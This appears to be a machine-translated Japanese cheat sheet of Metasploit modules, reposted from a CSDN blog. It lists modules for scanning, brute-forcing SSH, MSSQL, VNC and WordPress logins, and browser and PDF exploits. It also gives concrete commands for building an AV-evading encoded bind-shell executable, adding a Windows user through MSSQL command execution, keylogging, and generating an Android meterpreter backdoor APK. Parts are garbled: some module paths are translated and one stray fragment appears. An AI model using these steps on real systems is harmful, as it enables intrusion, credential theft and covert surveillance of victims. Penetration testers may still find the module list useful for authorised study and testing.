msf とその一般的に使用されるモジュールの概要

技術機能モジュール

エクスプロイト: システムの脆弱性を利用して攻撃するアクション。このモジュールは、それぞれの特定の脆弱性の攻撃方法に対応します。

ペイロード: エクスプロイトが成功した後、ターゲット システム上で実際に実行されるコードまたは命令

補助: 情報収集、列挙、指紋検出、スキャンなどの機能を実行する補助モジュール

エンコーダ: ペイロードを暗号化し、AV 検査を回避するモジュール

nops: ペイロードの安定性を向上させ、サイズを維持します

共通オプションの説明を生成します。
-b 不正な文字を削除します。例: -b '\x00\xff'
-e エンコード方式を設定します。show encoders コマンドを使用してすべてのエンコード方式を表示できます
。 -f 出力フォーマット(設定されていない場合)。デフォルトは Ruby 言語です。たとえば、-fc または -f exe
は、エンコードの数を設定します。通常、複数のエンコードの回避として使用されます
。 -k は、ソース テンプレートの動作を維持し、ペイロードをスレッドとしてプロセスに挿入します。多くの場合、-x と組み合わせて使用​​されます。 -o
出力ファイル名
-x ファイルをテンプレートとして定義します

ペイロード/windows/shell_bind_tcp を使用する

generate -b ‘\x00\xff’ -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe

メータープリターコマンド

背景: pwd を返す lpwd ls cat 実行: プログラムを実行 getuid hashdump ps record_mic: マイクを録音する webcam_list: カメラを読み取る

ホスト スキャン モジュール: 補助/スキャナ/ディスカバリー/arp_スイープ

ポート スキャン モジュール: 補助/スキャナ/ポートスキャン/syn

パスワード スニッフィング:auxiliary/sniffer/psnuffle を使用 - pcap キャプチャ ファイルからのパスワードの抽出をサポートします。現在サポートしているのは、pop3、imap、ftp、http get プロトコルのみです。

SNMPスキャン

補助/スキャナ/snmp/snmp_login を使用する

補助/スキャナ/snmp/snmp_enum を使用する

Auxiliary/scanner/snmp/snmp_enumusers を使用する (Windows)

Auxiliary/scanner/snmp/snmp_enumshares (Windows)aSASD//AS を使用する

SMBバージョンスキャン

補助/スキャナ/smb/smb_version を使用する

名前付きパイプをスキャンして、SMB サービス タイプ (アカウント パスワード) を確認します。

Auxiliary/scanner/smb/pipe_auditor を使用する

SMB パイプ経由でアクセス可能な RCERPC サービスをスキャンします。

Auxiliary/scanner/smb/pipe_dcerpc_auditor を使用する

SMB 共有の列挙 (アカウント、パスワード)

補助/スキャナ/smb/smb_enumshares を使用する

SMB ユーザーの列挙 (アカウント、パスワード)

Auxiliary/scanner/smb/smb_enumusers を使用する

SID 列挙 (アカウント、パスワード)

Auxiliary/scanner/smb/smb_lookupsid を使用する

SSHバージョンスキャン

補助/スキャナ/ssh/ssh_version を使用する

SSHパスワードブラスティング

補助/スキャナ/ssh/ssh_login を使用する

SSH公開鍵ログイン

補助/スキャナ/ssh/ssh_login_pubkey を使用する

Windows用のパッチが不足している

post/windows/gather/enum_patches を使用する

mssqlスキャンポート

tcp1433 (動的ポート)、udp1434 (クエリ TCP ポート番号)

補助/スキャナ/mssql/mssql_ping を使用する

ブラストmssqlパスワード

補助/スキャナ/mssql/mssql_login を使用する

リモートコード実行

補助/スキャナ/mssql/mssql_exec を使用する

set CMD ネットユーザー ユーザーパス /ADD

FTPバージョンスキャン

補助/スキャナ/ftp/ftp_version を使用する

補助/スキャナ/ftp/匿名を使用する

補助/スキャナ/ftp/ftp_login を使用する

脆弱性スキャン

VNCパスワードクラッキング

補助/スキャナ/vnc/vnc_login を使用する

vnc パスワードなしアクセス

補助/スキャナ/vnc/vnc_none_auth を使用する

RDP リモート デスクトップの脆弱性

補助/スキャナ/rdp/ms12_020_check を使用する

チェックは dos 攻撃を引き起こしません

デバイスのバックドア

補助/スキャナ/ssh/juniper_backdoor を使用する

補助/スキャナ/ssh/fortinet_backdoor を使用する

VMware ESXI パスワードのブラスティング

Auxiliary/scanner/vmware/vmauthd_login を使用する

補助/スキャナ/vmware/vmware_enum_vms を使用する

WEB APIを利用する

auxiliary/admin/vmware/poweron_vm を使用します

http脆弱性スキャン

期限切れの証明書: Auxiliary/scanner/http/cert を使用します。

ディレクトリとファイルを表示します:auxiliary/scanner/http/dir_listing を使用します。

補助/スキャナ/http/files_dirを使用

webdav unicode エンコード ID バイパス:auxiliary/scanner/http/dir_webdav_unicode_bypass を使用します

Tomcat 管理ログイン:auxiliary/scanner/http/tomcat_mgr_login を使用します。

http 方式に基づく認証バイパス:auxiliary/scanner/http/verb_auth_bypass を使用します。

Wordpress パスワードのブラスティング:auxiliary/scanner/http/wordpress_login_enum を使用します

set URI/wordpress/wp-login.php

Acrobat Readerの脆弱性を利用してペイロードを実行する

PDF ファイルの構築:exploit/windows/fileformat/adobe_utilprintf

悪意のある Web サイトを構築する:exploit/windows/browser/adobe_utilprintf

メーター通訳

特権を使用する

post/windows/capture/keylog_recorder を実行します

Flashプラグインの脆弱性を悪用してペイロードを実行する

エクスプロイト/マルチ/ブラウザ/adobe_flash_hacking_team_uaf を使用します

エクスプロイト/マルチ/ブラウザ/adobe_flash_opaque_background_uaf を使用してください

auxiliary/server/browser_autopwn2 を使用します

IEブラウザの脆弱性を利用してペイロードを実行する

エクスプロイト/windows/browser/ms14_064_ole_code_execution を使用します (windowsxp)

JREの脆弱性を利用したペイロードの実行

エクスプロイト/マルチ/ブラウザ/java_jre17_driver_manager を使用します

エクスプロイト/マルチ/ブラウザ/java_jre17_jmxbeanを使用します

エクスプロイト/マルチ/ブラウザ/java_jre17_reflection_types を使用します

Androidバックドアプログラムを生成する

ペイロード/android/meterpreter/reverse_tcp を使用する

生成 -f a.apk -p android -t raw

おすすめ

転載: blog.csdn.net/bwt_D/article/details/123213077